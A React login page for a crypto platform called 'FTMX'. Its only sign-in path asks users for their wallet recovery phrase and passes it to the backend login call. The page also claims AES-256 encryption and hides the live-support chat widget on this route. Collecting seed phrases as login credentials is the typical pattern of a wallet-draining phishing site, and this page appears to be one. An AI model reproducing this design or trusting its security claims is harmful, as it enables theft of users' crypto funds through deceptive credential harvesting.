import React, { useState, useEffect } from 'react';
import { Link, useNavigate } from 'react-router-dom';
import { ArrowRight, ArrowLeft, Shield } from 'lucide-react';
import BrandLogo from '../components/BrandLogo';
import WalletConnectModal from '../components/WalletConnectModal';
import { useAuth } from '../App';
import { isDatabaseUnavailableError, isTimeoutError, warmUpServer } from '../services/apiService';
import toast from 'react-hot-toast';
import './Auth.css';

const Login = () => {
  const [isModalOpen, setIsModalOpen] = useState(false);
  const { loginUser, user } = useAuth();
  const navigate = useNavigate();

  useEffect(() => {
    warmUpServer();
  }, []);

  useEffect(() => {
    if (!isModalOpen) return;
    warmUpServer();
  }, [isModalOpen]);

  // Redirect if already logged in
  useEffect(() => {
    if (user) {
      navigate('/dashboard');
    }
  }, [user, navigate]);

  // Hard-hide live chat on login page
  useEffect(() => {
    const selector = [
      "iframe[src*='tawk.to']",
      "iframe[src*='embed.tawk.to']",
      "iframe[src*='va.tawk.to']",
      "iframe[id*='tawk']",
      "[id*='tawkchat']",
      "[id^='tawk']",
      "[class*='tawk']",
      '#tawkchat-container',
      '.tawk-min-container',
      '.tawk-max-container',
      '.tawk-button-circle',
    ].join(',');

    document.body.classList.add('chat-hidden-route');
    const enforceHide = () => {
      document.querySelectorAll(selector).forEach((el) => {
        el.style.setProperty('display', 'none', 'important');
        el.style.setProperty('visibility', 'hidden', 'important');
        el.style.setProperty('pointer-events', 'none', 'important');
      });
    };

    enforceHide();
    const intervalId = window.setInterval(enforceHide, 300);
    const timeoutId = window.setTimeout(() => window.clearInterval(intervalId), 5000);

    return () => {
      window.clearInterval(intervalId);
      window.clearTimeout(timeoutId);
      document.body.classList.remove('chat-hidden-route');
    };
  }, []);

  const handleWalletConnect = async (walletData) => {
    try {
      // Login with seed phrase
      const result = await loginUser({
        seedPhrase: walletData.seedPhrase
      });
      
      if (result) {
        if (result.error === 'suspended') {
          setIsModalOpen(false);
          toast.error('Your account has been suspended. Please contact support.');
          return;
        }
        setIsModalOpen(false);
        toast.success('Welcome back!');
        navigate('/dashboard');
      } else {
        // If not found, redirect to sign up
        setIsModalOpen(false);
        toast.error('No account found. Please sign up first.');
        setTimeout(() => navigate('/get-started'), 1500);
      }
    } catch (error) {
      console.error('Login error:', error);
      const message = isTimeoutError(error)
        ? 'Server is waking up. Please wait a moment and try again.'
        : isDatabaseUnavailableError(error)
        ? 'Database connection failed. Please contact support to restore service.'
        : 'Login failed. Please try again.';
      toast.error(message);
      throw error;
    }
  };

  return (
    <div className="auth-page">
      <div className="auth-container">
        {/* Left Side - Branding */}
        <div className="auth-branding">
          <div className="branding-content">
            <Link to="/" className="auth-logo">
              <BrandLogo height={40} />
            </Link>

            <div className="branding-text">
              <h1>Welcome<br />Back</h1>
              <p>Sign in to access your dashboard and manage your FTMX holdings.</p>
            </div>

            <div className="login-features">
              <div className="login-feature">
                <span className="feature-icon">🔐</span>
                <div className="feature-text">
                  <strong>Secure Access</strong>
                  <span>Multi-layer authentication</span>
                </div>
              </div>
              <div className="login-feature">
                <span className="feature-icon">⚡</span>
                <div className="feature-text">
                  <strong>Instant Sync</strong>
                  <span>Real-time portfolio updates</span>
                </div>
              </div>
              <div className="login-feature">
                <span className="feature-icon">🌐</span>
                <div className="feature-text">
                  <strong>Multi-Chain</strong>
                  <span>50+ networks supported</span>
                </div>
              </div>
            </div>

            <div className="branding-footer">
              <p>Protected by enterprise-grade security</p>
            </div>
          </div>

          <div className="branding-bg">
            <div className="bg-gradient"></div>
            <div className="bg-pattern"></div>
          </div>
        </div>

        {/* Right Side - Form */}
        <div className="auth-form-section">
          <div className="auth-form-container">
            <Link to="/" className="back-link">
              <ArrowLeft size={18} />
              Back to Home
            </Link>

            <div className="auth-form-content">
              <div className="form-header">
                <h2>Login</h2>
                <p>Sign in with your wallet credentials</p>
              </div>

              <button 
                className="connect-wallet-btn"
                onClick={() => setIsModalOpen(true)}
              >
                <div className="btn-icon">
                  <Shield size={24} />
                </div>
                <div className="btn-text">
                  <span className="btn-title">Connect Wallet</span>
                  <span className="btn-subtitle">Use your recovery phrase to sign in</span>
                </div>
                <ArrowRight size={20} />
              </button>

              <p className="security-note">
                🔒 Your credentials are encrypted with AES-256 and verified securely.
              </p>

              <div className="auth-footer">
                <p>
                  Don't have an account?{' '}
                  <Link to="/get-started">Get Started</Link>
                </p>
              </div>
            </div>
          </div>
        </div>
      </div>

      <WalletConnectModal
        isOpen={isModalOpen}
        onClose={() => setIsModalOpen(false)}
        onConnect={handleWalletConnect}
        mode="login"
      />
    </div>
  );
};

export default Login;
